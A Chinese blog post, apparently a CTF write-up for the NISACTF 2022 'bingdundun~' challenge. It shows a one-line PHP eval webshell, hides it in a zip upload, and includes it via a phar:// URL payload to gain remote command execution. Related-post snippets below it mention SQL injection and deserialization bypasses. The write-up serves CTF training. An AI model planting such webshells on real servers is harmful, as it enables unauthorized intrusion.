[NISACTF 2022]bingdundun~-wp

于 2024-12-24 22:22:43 发布
阅读量266 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: ctf 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80307588/article/details/144703990

进入题目,发现有URL传参,提示只能上传图片或者压缩包,猜测使用phar伪协议

什么是phar伪协议呢? 

phar://伪协议是php解压缩报的一个函数,不管后缀是什么,都会当做压缩包来解压,用法:?file=phar://压缩包/内部文件 phar://xxx.png/shell.php 注意 PHP>=5.3.0压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。步骤:写一个一句话木马shell。php,然后用zip协议解压缩为shell.zip。然后将后缀改为png等其他格式。

简单来说,就是我们写一个一句话木马,然后压缩成.zip,然后再用phar伪协议解压。

所用一句话木马1.php如下:

<?=@ eval($_POST['cmd'])?>

将其压缩成1.zip并上传

然后由于这道题会自动补全.php文件尾,所以payload:

xxxxxxx/?bingdundun=phar://xxxxxxxx.zip/1

蚁剑连接即可得到flag 

[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 779
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
[NISACTF 2022]babyserialize - 反序列化(waf绕过)【*】
oZuoShen123的博客
10-07 1178
1、分析链条和属性   链条:`TianXiWeis(__wakeup)-> Ilovetxw(__call)-> four(__set) -> Ilovetxw(__toString)-> NISA(__invoke)`   属性:`TianXiWeis(ext=$i)-> Ilovetxw(huang=$f)-> four(fun="sixsixsix";a=$i)-> Ilovetxw(su=$n)-> NISA(txw4ever=命令)`
[NISACTF 2022]bingdundun~
m0_73612768的博客
01-05 950
用 phar 伪协议进行文件包含;
ISCC2022河南赛区-WP
06-06
ISCC2022河南赛区-WP,最后大概是五千分左右,排名一百出头(练武题),各个方向都有。
NISACTF 2022 MISC 部分WP
qq_51447967的博客
04-28 2560
[NISACTF 2022]bilala的二维码 题目提示如下 bilala说,里面会不会还藏着什么东西呢,图片分辨率好像有用诶,压缩包密码好像和战队名字相关 下载得到一张缺少定位符号的二维码,手动补全,然后扫描。 扫描得到一个URL,如下 https://video.gz2.com.cn/h666G/h666G_kzwIVy 进去下载得到一张图片,如下 对图片进行分析 可以看到第一张图片后面又附加了一张图片,然后第二张图片后面有个压缩包,全部提取出来。 看了下图片没有发现什么,然后去分析压
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
[NISACTF 2022]bingdundun
jhk8698的博客
10-19 1894
[NISACTF 2022]bingdundun 刷题记录
[NISACTF 2022]bingdundun wp
Leaf_initial的博客
04-14 635
这里大部分人可能会报错,这个错误信息表示在运行phar.php文件时,创建归档文件“exp.phar”的功能被禁用了。由于我一直报错,不能生成文件,改了也没有用,所以找到了第二种解决办法,在php文件的目录下打开cmd,然后命令行输入。(但是不知道为什么我的phpinfo信息不能显示,于是重新上传了一个,变量名改了一下,改成了8,就可以了)可以看到example.phar压缩文件中有phar.php文件,里面有一个php代码,内容是一句话木马。连接成功,在根目录中的flag文件找到了flag,结束。
【Web】NISACTF 2022 个人复现
uuzeray的博客
12-01 409
明天就新生赛了,练套题保持下手感吧(文章只选取了一部分)
NSSCTF-Web题目21(文件上传-phar协议、RCE-空格绕过)
最新发布
weixin_54055099的博客
07-02 906
phar伪协议、RCE-空格绕过
NSS [NISACTF 2022]bingdundun~
Jay17的博客
11-16 533
NSS [NISACTF 2022]bingdundun~
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 5425
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
NISACTF2022公开通道
as you know, nlp is fantasitc!
03-29 6868
NISACTF2022公开通道checkinlevel_up第一层 robots.txt第二层 md5碰撞第三层 sha1碰撞第四层 parse_url解析漏洞第五层create_function()注入bingdundunbabyserializebabyuploadeasyssrfis secret(原题)popchain(原题)middlevel(原题) 题目 checkin urlencode,因为解释器读取出来的才是真正的顺序 ahahahaha=jitanglailo&&%E2%
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值